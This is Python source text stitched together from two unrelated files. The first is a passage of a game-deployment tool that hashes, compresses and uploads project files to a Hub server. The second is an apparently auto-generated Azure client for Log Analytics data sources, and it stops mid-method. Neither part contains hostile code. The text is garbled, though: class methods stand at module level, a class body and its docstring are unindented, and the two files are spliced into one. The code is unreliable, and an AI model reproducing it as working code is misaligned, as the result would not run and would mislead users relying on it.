                                    gzipfile.write(f.read())
                        except IOError as e:
                            self.stop('Error compressing file "%s": "%s".' % (relative_path, str(e)))
                            continue
                        LOG.warning('Using Python for GZip compression, install 7zip for optimal performance')
                        update_meta_data = True
                        if calculate_hash:
                            calculate_hash = False
                            file_hash = hash_file_sha256(abs_path)
                        try:
                            if stat(deploy_file_name).st_size >= file_size:
                                deploy_file_name = abs_path
                        except error as e:
                            self.stop('Error opening compressed file "%s": "%s".' % (deploy_file_name, str(e)))
                            continue
                        file_md5 = hash_file_md5(deploy_file_name)
            else:
                # File type must be deployed uncompressed
                deploy_file_name = abs_path
            if calculate_hash:
                update_meta_data = True
                if deploy_file_name == abs_path:
                    # Single pass computes both digests of the same file
                    file_hash, file_md5 = hash_file_sha256_md5(abs_path)
                else:
                    # sha256 of the source, md5 of the deployed (gzip) file
                    file_hash = hash_file_sha256(abs_path)
                    file_md5 = hash_file_md5(deploy_file_name)
            if get_cached_file_name(relative_path, file_hash, file_size) not in hashes:
                # Unknown to the Hub: queue for a batched existence check
                file_item = (deploy_file_name, relative_path, file_size, file_hash, file_md5, file_time)
                files_to_batch_check.append(file_item)
                if len(files_to_batch_check) >= 10:
                    self.batch_check_files(files_to_batch_check, checked_queue_put)
                    files_to_batch_check = []
            elif update_meta_data:
                checked_queue_put((relative_path, file_size, file_hash, file_md5, file_time))
            else:
                checked_queue_put((relative_path, file_size, file_hash, file_time))  # Nothing to do
            # Drop the stat result reference before the next iteration
            file_stat = None
        except (error, IOError) as e:
            self.stop('Error opening file "%s": "%s".' % (relative_path, str(e)))
        except Exception as e:
            self.stop('Error checking file "%s": "%s".' % (relative_path, str(e)))
    # Flush any remaining files that did not fill a batch of 10
    if len(files_to_batch_check) > 0:
        try:
            self.batch_check_files(files_to_batch_check, checked_queue_put)
        except (HTTPError, SSLError, ValueError) as e:
            self.stop('Error checking files: "%s".' % str(e))
        except Exception as e:
            self.stop('Error checking files: "%s".' % str(e))
# pylint: enable=R0914,R0915
def find_files(self):
    """Return the list of files matching the configured glob patterns.

    Directories matched by a pattern are walked recursively, skipping any
    subdirectory named in self._directories_to_ignore. Paths are normalized
    to forward slashes; duplicates are removed via the intermediate set.
    """
    found = set()
    root = self.path
    skip_dirs = self._directories_to_ignore
    for pattern in self.files:
        if not pattern:
            continue
        for abs_path in iglob(join(root, pattern)):
            if not isdir(abs_path):
                found.add(abs_path.replace('\\', '/'))
                continue
            for current_dir, sub_dirs, file_names in walk(abs_path):
                if sub_dirs:
                    # Prune ignored subdirectories by mutating the list
                    # in place so walk() never descends into them
                    sub_dirs[:] = (d for d in sub_dirs if d not in skip_dirs)
                # Normalize separators and record every file found
                found.update(join(current_dir, name).replace('\\', '/')
                             for name in file_names)
    return list(found)
def load_hashes(self, project):
    """Return the set of upload hashes known for this Hub host.

    Combines non-stale locally cached hash files with the list requested
    from the Hub for *project*. Stale or unreadable cache files are deleted.
    """
    hashes = set()
    try:
        # Files containing cached hashes are stored in a folder called "__cached_hashes__".
        # The name of the file contains the creation time
        # so we skip files that are too old
        hashes_folder = join(self.cache_dir, self._cached_hash_folder)
        # int() instead of the Python-2-only long(); Python 2 ints
        # auto-promote so the behavior is unchanged there
        stale_time = int(time() - self._cached_hash_ttl)  # 30 days
        for file_path in iglob(join(hashes_folder, '*.json')):
            delete_file = True
            try:
                file_time = int(splitext(basename(file_path))[0])
                if stale_time < file_time:
                    # with-statement closes the file even if json_load raises
                    with open(file_path, 'rb') as file_obj:
                        hashes_meta = json_load(file_obj)
                    # pylint: disable=E1103
                    hashes_version = hashes_meta.get('version', 0)
                    if 2 <= hashes_version:
                        cached_hashes = hashes_meta.get('hashes', None)
                        if cached_hashes:
                            delete_file = False
                            hashes_host = hashes_meta.get('host', None)
                            # Only trust hashes recorded for the same Hub host
                            if hashes_host == self.hub_pool.host:
                                hashes.update(cached_hashes)
                    # pylint: enable=E1103
            except (TypeError, ValueError):
                pass
            if delete_file:
                LOG.info('Deleting stale cache file: %s', file_path)
                remove(file_path)
    except (IOError, error):
        pass
    except Exception as e:
        LOG.error(str(e))
    hashes.update(self.request_hashes(project))
    return hashes
def request_hashes(self, project):
    """Fetch the list of known file hashes for *project* from the Hub.

    Returns an empty list on any network/parse failure or when the Hub
    does not support the minimum list format version.
    """
    min_version = 2
    try:
        list_url = '/dynamic/upload/list?version=%d&project=%s' % (min_version, project)
        response = self.hub_pool.urlopen('GET',
                                         list_url,
                                         headers={'Cookie': self.hub_cookie,
                                                  'Accept-Encoding': 'gzip'},
                                         redirect=False,
                                         assert_same_host=False,
                                         timeout=self.hub_timeout)
        if response.status == 200:
            payload = json_loads(response.data)
            # pylint: disable=E1103
            if payload.get('version', 1) >= min_version:
                return payload['hashes']
            # pylint: enable=E1103
    except (HTTPError, SSLError, TypeError, ValueError):
        pass
    except Exception as e:
        LOG.error(str(e))
    return []
def save_hashes(self, hashes):
    """Persist the hashes not already covered by existing cache files.

    Existing cache files for the same Hub host are subtracted from *hashes*
    so only the delta is written, in a new file named after the current time.
    """
    try:
        hashes_folder = join(self.cache_dir, self._cached_hash_folder)
        try:
            makedirs(hashes_folder)
        except OSError as e:
            if e.errno != EEXIST:
                LOG.error(str(e))
                return
        # Load existing cache and only save the delta
        for file_path in iglob(join(hashes_folder, '*.json')):
            try:
                # with-statement closes the file even when parsing fails
                # (the original leaked the handle on a bad/partial file)
                with open(file_path, 'rb') as file_obj:
                    hashes_meta = json_load(file_obj)
                if hashes_meta['host'] == self.hub_pool.host:
                    hashes.difference_update(hashes_meta['hashes'])
            except (IOError, TypeError, ValueError, KeyError, AttributeError):
                pass
        if hashes:
            try:
                # int() instead of the Python-2-only long()
                file_path = join(hashes_folder, '%d.json' % int(time()))
                with open(file_path, 'wb') as file_obj:
                    hashes_meta = {'version': 2,
                                   'host': self.hub_pool.host,
                                   'hashes': list(hashes)}
                    json_dump(hashes_meta, file_obj, separators=(',', ':'))
            except IOError:
                pass
    # pylint: disable=W0703
    except Exception as e:
        LOG.error(str(e))
    # pylint: enable=W0703
def start_scan_workers(self, files, checked_queue, hashes, ultra, cache_time, meta_data_cache):
    """Spawn up to 4 threads that each check a contiguous slice of *files*.

    Results are reported through checked_queue (see check_files).
    """
    num_files = len(files)
    if num_files <= 0:
        # Nothing to scan; the original divided by zero workers here
        return
    num_workers = min(4, num_files)
    start = 0
    # Ceiling division so the slices cover every file
    step = (num_files + num_workers - 1) // num_workers
    for _ in range(num_workers):
        end = min(start + step, num_files)
        Thread(target=self.check_files, args=[files, start, end,
                                              checked_queue.put,
                                              hashes, ultra, cache_time, meta_data_cache]).start()
        start = end
# pylint: disable=R0914
def scan_files(self, hashes, ultra):
    """Scan all project files and split them into scanned vs. to-upload.

    Spawns worker threads (start_scan_workers) and drains their result
    queue. Items arriving on the queue are (see check_files):
      None                       -> worker stopped early
      string (basestring, Py2)   -> invalid file, reduces the expected count
      4-tuple                    -> file unchanged
      5-tuple                    -> meta data cache update only
      6-tuple                    -> file must be uploaded
    Returns (files_scanned, files_to_upload).
    """
    files = self.find_files()
    num_files = len(files)
    self.total_files = num_files
    cache_time, meta_data_cache = self.read_metadata_cache()
    checked_queue = Queue()
    self.start_scan_workers(files, checked_queue, hashes, ultra, cache_time, meta_data_cache)
    files_scanned = []
    files_to_upload = []
    meta_data = {}
    update_meta_data = False
    newer_time = -1
    while True:
        item = checked_queue.get()
        if item is None or self.stopped:  # Stop event
            break
        elif isinstance(item, basestring):  # Invalid file
            # Lower the expected total so the exit check below still fires
            num_files -= 1
        else:
            if len(item) == 4:  # Nothing to do for this file
                relative_path, file_size, file_hash, file_time = item
                # Carry the cached entry forward unchanged
                meta_data[relative_path] = meta_data_cache[relative_path]
                files_scanned.append((relative_path, file_size, file_hash))
            else:
                if len(item) == 5:  # Only need to update meta data cache
                    relative_path, file_size, file_hash, file_md5, file_time = item
                    files_scanned.append((relative_path, file_size, file_hash))
                else:  # Need to upload too
                    deploy_path, relative_path, file_size, file_hash, file_md5, file_time = item
                    files_to_upload.append((deploy_path, relative_path, file_size, file_hash, file_md5))
                meta_data[relative_path] = {'length': file_size,
                                            'hash': file_hash,
                                            'md5': file_md5}
                update_meta_data = True
            # Track the newest file time seen, for the cache timestamp
            if newer_time < file_time:
                newer_time = file_time
            self.num_bytes += file_size
            self.num_files += 1
        if self.num_files >= num_files:
            break
        item = None
    if self.stopped:
        # Copy old data to avoid recalculations
        meta_data.update(meta_data_cache)
    if update_meta_data or newer_time > cache_time or len(meta_data) != len(meta_data_cache):
        self.write_metadata_cache(meta_data, newer_time)
        self.delete_unused_cache_files(meta_data, meta_data_cache)
    return files_scanned, files_to_upload
# pylint: enable=R0914
def update_num_bytes(self, x):
    """Add the byte length of *x* to the running total."""
    self.num_bytes = self.num_bytes + len(x)
def post(self, url, params, boundary):
    """POST *params* as a multipart/form-data body to *url* on the Hub."""
    headers = get_headers(params, boundary)
    headers['Cookie'] = self.hub_cookie
    # Encode the parameters and stream them through a MultipartReader
    body = MultipartReader(MultipartParam.from_params(params), boundary)
    return self.hub_pool.urlopen('POST',
                                 url,
                                 body,
                                 headers=headers,
                                 timeout=self.hub_timeout)
# pylint: disable=R0914
def post_files(self, files, start, end, uploaded_queue_put, boundary, local_deploy):
    """Worker loop: upload files[start:end] to the Hub one by one.

    files -- list of tuples (deploy_path, relative_path, size, hash, md5)
    uploaded_queue_put -- callable; given (relative_path, size, hash) per
        successful upload, or None when stopping early.
    local_deploy -- when True the Hub runs on this machine, so only the
        file path is posted instead of the file contents.
    """
    hub_session = self.hub_session
    hub_cookie = self.hub_cookie
    hub_pool = self.hub_pool
    while start < end:
        if self.stopped:
            uploaded_queue_put(None)  # Make sure the waiting thread wakes up
            break
        item = files[start]
        start += 1
        deploy_path, relative_path, file_size, file_hash, file_md5 = item
        try:
            if local_deploy:
                guessed_type = guess_type(relative_path)[0]
                if guessed_type is None:
                    guessed_type = ""
                # Local Hub: send the path, not the contents
                params = {'file.content_type': guessed_type,
                          'file.name': relative_path,
                          'file.path': deploy_path,
                          'session': hub_session,
                          'hash': file_hash,
                          'length': str(file_size),
                          'md5': file_md5}
                if deploy_path.endswith('.gz'):
                    params['encoding'] = 'gzip'
                r = hub_pool.request('POST',
                                     '/dynamic/upload/file',
                                     fields=params,
                                     headers={'Cookie': hub_cookie},
                                     timeout=self.hub_timeout)
            else:
                # Remote Hub: stream the file as multipart/form-data
                params = [MultipartParam('file',
                                         filename=relative_path,
                                         filetype=guess_type(relative_path)[0],
                                         fileobj=open(deploy_path, 'rb')),
                          ('session', hub_session),
                          ('hash', file_hash),
                          ('length', file_size),
                          ('md5', file_md5)]
                if deploy_path.endswith('.gz'):
                    params.append(('encoding', 'gzip'))
                headers = get_headers(params, boundary)
                headers['Cookie'] = hub_cookie
                params = MultipartParam.from_params(params)
                params = MultipartReader(params, boundary)
                r = hub_pool.urlopen('POST',
                                     '/dynamic/upload/file',
                                     params,
                                     headers=headers,
                                     timeout=self.hub_timeout)
        except IOError:
            self.stop('Error opening file "%s".' % deploy_path)
            continue
        except (HTTPError, SSLError, ValueError) as e:
            self.stop('Error uploading file "%s": "%s".' % (relative_path, e))
            continue
        # A non-JSON response means the Hub failed outside its API handler
        if r.headers.get('content-type', '') != 'application/json; charset=utf-8':
            self.stop('Hub error uploading file "%s".' % relative_path)
            continue
        answer = json_loads(r.data)
        # pylint: disable=E1103
        if r.status != 200:
            if answer.get('corrupt', False):
                self.stop('File "%s" corrupted on transit.' % relative_path)
            else:
                msg = answer.get('msg', None)
                if msg:
                    self.stop('Error when uploading file "%s".\n%s' % (relative_path, msg))
                else:
                    self.stop('Error when uploading file "%s": "%s"' % (relative_path, r.reason))
            continue
        if not answer.get('ok', False):
            self.stop('Error uploading file "%s".' % relative_path)
            continue
        # pylint: enable=E1103
        uploaded_queue_put((relative_path, file_size, file_hash))
        # Drop references early so large buffers can be reclaimed
        answer = None
        r = None
        params = None
        relative_path = None
        deploy_path = None
        item = None
# pylint: enable=R0914
def start_upload_workers(self, files, uploaded_queue, boundary, local_deploy):
    """Spawn up to 4 threads that each upload a contiguous slice of *files*.

    Results are reported through uploaded_queue (see post_files).
    """
    num_files = len(files)
    if num_files <= 0:
        # Nothing to upload; the original divided by zero workers here
        return
    num_workers = min(4, num_files)
    start = 0
    # Ceiling division so the slices cover every file
    step = (num_files + num_workers - 1) // num_workers
    for _ in range(num_workers):
        end = min(start + step, num_files)
        Thread(target=self.post_files, args=[files, start, end, uploaded_queue.put, boundary, local_deploy]).start()
        start = end
def upload_files(self, ultra):
    """Scan the project and upload any changed files to the Hub.

    Starts an upload session with /dynamic/upload/begin, then streams the
    files that the scan flagged for upload. Returns True when everything
    was uploaded (or nothing needed uploading), False on error/stop.

    ultra -- passed through to the scan for maximum compression settings.
    """
    hashes = self.load_hashes(self.hub_project)
    files_scanned, files_to_upload = self.scan_files(hashes, ultra)
    if self.stopped:
        return False
    num_files = self.num_files
    if num_files <= 0:
        return True
    boundary = gen_boundary()
    # A Hub on this machine accepts file paths instead of file contents
    local_deploy = self.hub_pool.host in ['127.0.0.1', '0.0.0.0', 'localhost']
    try:
        if local_deploy:
            params = {'files.path': self.get_meta_data_path(),
                      'encoding': 'gzip',
                      'project': self.hub_project,
                      'version': self.hub_version,
                      'versiontitle': self.hub_versiontitle,
                      'pluginmain': self.plugin_main,
                      'canvasmain': self.canvas_main,
                      'flashmain': self.flash_main,
                      'mappingtable': self.mapping_table,
                      'engineversion': self.engine_version,
                      'ismultiplayer': self.is_multiplayer,
                      'aspectratio': self.aspect_ratio,
                      'numfiles': str(num_files),
                      'numbytes': str(self.num_bytes),
                      'localversion': __version__}
            r = self.hub_pool.request('POST',
                                      '/dynamic/upload/begin',
                                      fields=params,
                                      headers={'Cookie': self.hub_cookie},
                                      timeout=self.hub_timeout)
        else:
            r = self.post('/dynamic/upload/begin',
                          [MultipartParam('files',
                                          filename='files.json',
                                          filetype='application/json; charset=utf-8',
                                          fileobj=open(self.get_meta_data_path(), 'rb')),
                           ('encoding', 'gzip'),
                           ('project', self.hub_project),
                           ('version', self.hub_version),
                           ('versiontitle', self.hub_versiontitle),
                           ('pluginmain', self.plugin_main),
                           ('canvasmain', self.canvas_main),
                           ('flashmain', self.flash_main),
                           ('mappingtable', self.mapping_table),
                           ('engineversion', self.engine_version),
                           ('ismultiplayer', self.is_multiplayer),
                           ('aspectratio', self.aspect_ratio),
                           ('numfiles', num_files),
                           ('numbytes', self.num_bytes),
                           ('localversion', __version__)],
                          boundary)
    except IOError:
        self.stop('Error opening file "%s".' % self.get_meta_data_path())
        return False
    except (HTTPError, SSLError) as e:
        self.stop('Error starting upload: "%s".' % e)
        return False
    if r.status == 504:
        self.stop('Hub timed out.')
        return False
    # Parse the JSON body when present; fall back to an empty answer
    if r.headers.get('content-type', '') == 'application/json; charset=utf-8' and r.data != '':
        try:
            answer = json_loads(r.data)
        except JSONDecodeError as e:
            LOG.error(e)
            answer = {}
    else:
        answer = {}
    if r.status != 200:
        msg = answer.get('msg', False)
        if msg:
            self.stop(msg)
        else:
            self.stop('Error starting upload: "%s".' % r.reason)
        return False
    hub_session = answer.get('session', None)
    if not answer.get('ok', False) or not hub_session:
        self.stop('Unsupported response format from Hub.')
        return False
    self.hub_session = hub_session
    get_cached_file_name = _get_cached_file_name
    # Files that only changed meta data count as "uploaded" immediately
    for file_name, file_size, file_hash in files_scanned:
        hashes.add(get_cached_file_name(file_name, file_hash, file_size))
        self.uploaded_bytes += file_size
        self.uploaded_files += 1
    if self.uploaded_files >= num_files:
        self.save_hashes(hashes)
        return True
    # we only reach this code if there are files to upload
    uploaded_queue = Queue()
    self.start_upload_workers(files_to_upload, uploaded_queue, boundary, local_deploy)
    while True:
        item = uploaded_queue.get()
        if item is None or self.stopped:
            break
        file_name, file_size, file_hash = item
        hashes.add(get_cached_file_name(file_name, file_hash, file_size))
        self.uploaded_bytes += file_size
        self.uploaded_files += 1
        if self.uploaded_files >= num_files:
            self.save_hashes(hashes)
            return True
        item = None
    # Stopped or a worker failed before every file was uploaded
    self.save_hashes(hashes)
    return False
@classmethod
def rename_cache(cls, cache_dir, old_slug, new_slug):
    """Rename a project's cache file and folder from *old_slug* to *new_slug*.

    Missing sources or destinations are silently ignored.
    """
    src_file = join(cache_dir, old_slug) + '.json.gz'
    dst_file = join(cache_dir, new_slug) + '.json.gz'
    src_folder = join(cache_dir, old_slug)
    dst_folder = join(cache_dir, new_slug)
    # Delete the destination first if necessary, otherwise the
    # old folder would just end up nested inside of it
    try:
        remove(dst_file)
        rmtree(dst_folder)
    except OSError:
        pass
    try:
        rename(src_file, dst_file)
        rename(src_folder, dst_folder)
    except OSError:
        pass
# pylint: enable=R0902
class MultipartReader(object):
    """File-like reader that yields a multipart/form-data body chunk by chunk.

    Iterates over the encoded params in order, then emits the closing
    boundary, then returns None to signal end of stream.
    """

    def __init__(self, params, boundary):
        self.params = params
        self.boundary = boundary
        self.i = 0
        self.param = None
        self.param_iter = None

    def read(self, blocksize):
        """Return the next encoded chunk (up to blocksize hint), the closing
        boundary once all params are consumed, then None."""
        if self.param_iter is not None:
            try:
                # next() builtin works on Python 2.6+ and Python 3,
                # unlike the Python-2-only iterator.next() method
                return next(self.param_iter)
            except StopIteration:
                # Current param exhausted; fall through to the next one
                self.param = None
                self.param_iter = None
        if self.i is None:
            # Stream already finished
            return None
        elif self.i >= len(self.params):
            # All params emitted: close the multipart body
            self.param_iter = None
            self.param = None
            self.i = None
            return "--%s--\r\n" % self.boundary
        # Start encoding the next param and recurse to return its first chunk
        self.param = self.params[self.i]
        self.param_iter = self.param.iter_encode(self.boundary, blocksize)
        self.i += 1
        return self.read(blocksize)

    def reset(self):
        """Rewind the reader (and every param) so the body can be re-sent."""
        self.i = 0
        for param in self.params:
            param.reset()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request(
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    subscription_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP PUT request that creates or updates a data source."""
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2020-08-01"
    accept = "application/json"

    # URL: substitute the serialized (and validated) path arguments
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
        "dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
    }
    url = _format_url_section(url, **path_args)

    # Query parameters
    query = kwargs.pop("params", {})  # type: Dict[str, Any]
    query['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=query,
        headers=headers,
        json=json,
        content=content,
        **kwargs
    )
def build_delete_request(
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP DELETE request that removes a data source."""
    api_version = "2020-08-01"

    # URL: substitute the serialized (and validated) path arguments
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
        "dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
    }
    url = _format_url_section(url, **path_args)

    # Query parameters
    query = kwargs.pop("params", {})  # type: Dict[str, Any]
    query['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    return HttpRequest(
        method="DELETE",
        url=url,
        params=query,
        **kwargs
    )
def build_get_request(
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request that fetches a single data source."""
    api_version = "2020-08-01"
    accept = "application/json"

    # URL: substitute the serialized (and validated) path arguments
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
        "dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
    }
    url = _format_url_section(url, **path_args)

    # Query parameters
    query = kwargs.pop("params", {})  # type: Dict[str, Any]
    query['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query,
        headers=headers,
        **kwargs
    )
def build_list_by_workspace_request(
    resource_group_name: str,
    workspace_name: str,
    subscription_id: str,
    *,
    filter: str,
    skiptoken: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request that lists a workspace's data sources."""
    api_version = "2020-08-01"
    accept = "application/json"

    # URL: substitute the serialized (and validated) path arguments
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
    }
    url = _format_url_section(url, **path_args)

    # Query parameters ($filter is required, $skiptoken is optional)
    query = kwargs.pop("params", {})  # type: Dict[str, Any]
    query['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    if skiptoken is not None:
        query['$skiptoken'] = _SERIALIZER.query("skiptoken", skiptoken, 'str')
    query['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query,
        headers=headers,
        **kwargs
    )
class DataSourcesOperations(object):
"""DataSourcesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.loganalytics.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
    """Store the pipeline client and (de)serialization helpers.

    Called by the generated service client, not by user code.
    """
    # Pipeline client used to send the prepared HTTP requests
    self._client = client
    # Serializer for request bodies / deserializer for responses
    self._serialize = serializer
    self._deserialize = deserializer
    # Service client configuration (provides e.g. subscription_id)
    self._config = config
@distributed_trace
def create_or_update(
    self,
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    parameters: "_models.DataSource",
    **kwargs: Any
) -> "_models.DataSource":
    """Create or update a data source.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param workspace_name: The name of the workspace.
    :type workspace_name: str
    :param data_source_name: The name of the datasource resource.
    :type data_source_name: str
    :param parameters: The parameters required to create or update a datasource.
    :type parameters: ~azure.mgmt.loganalytics.models.DataSource
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: DataSource, or the result of cls(response)
    :rtype: ~azure.mgmt.loganalytics.models.DataSource
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.DataSource"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
    body = self._serialize.body(parameters, 'DataSource')

    request = build_create_or_update_request(
        resource_group_name=resource_group_name,
        workspace_name=workspace_name,
        data_source_name=data_source_name,
        subscription_id=self._config.subscription_id,
        content_type=content_type,
        json=body,
        template_url=self.create_or_update.metadata['url'],
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in (200, 201):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    # Both 200 (updated) and 201 (created) carry a DataSource body
    deserialized = self._deserialize('DataSource', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'}  # type: ignore
@distributed_trace
def delete(
    self,
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    **kwargs: Any
) -> None:
    """Deletes a data source instance.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param workspace_name: The name of the workspace.
    :type workspace_name: str
    :param data_source_name: Name of the datasource.
    :type data_source_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    request = _convert_request(build_delete_request(
        resource_group_name=resource_group_name,
        workspace_name=workspace_name,
        data_source_name=data_source_name,
        subscription_id=self._config.subscription_id,
        template_url=self.delete.metadata['url'],
    ))
    request.url = self._client.format_url(request.url)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 = deleted, 204 = already absent; anything else is an error
    if response.status_code not in (200, 204):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'}  # type: ignore
@distributed_trace
def get(
    self,
    resource_group_name: str,
    workspace_name: str,
    data_source_name: str,
    **kwargs: Any
) -> "_models.DataSource":
    """Gets a datasource instance.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param workspace_name: The name of the workspace.
    :type workspace_name: str
    :param data_source_name: Name of the datasource.
    :type data_source_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: DataSource, or the result of cls(response)
    :rtype: ~azure.mgmt.loganalytics.models.DataSource
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.DataSource"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    request = _convert_request(build_get_request(
        resource_group_name=resource_group_name,
        workspace_name=workspace_name,
        data_source_name=data_source_name,
        subscription_id=self._config.subscription_id,
        template_url=self.get.metadata['url'],
    ))
    request.url = self._client.format_url(request.url)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in (200,):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

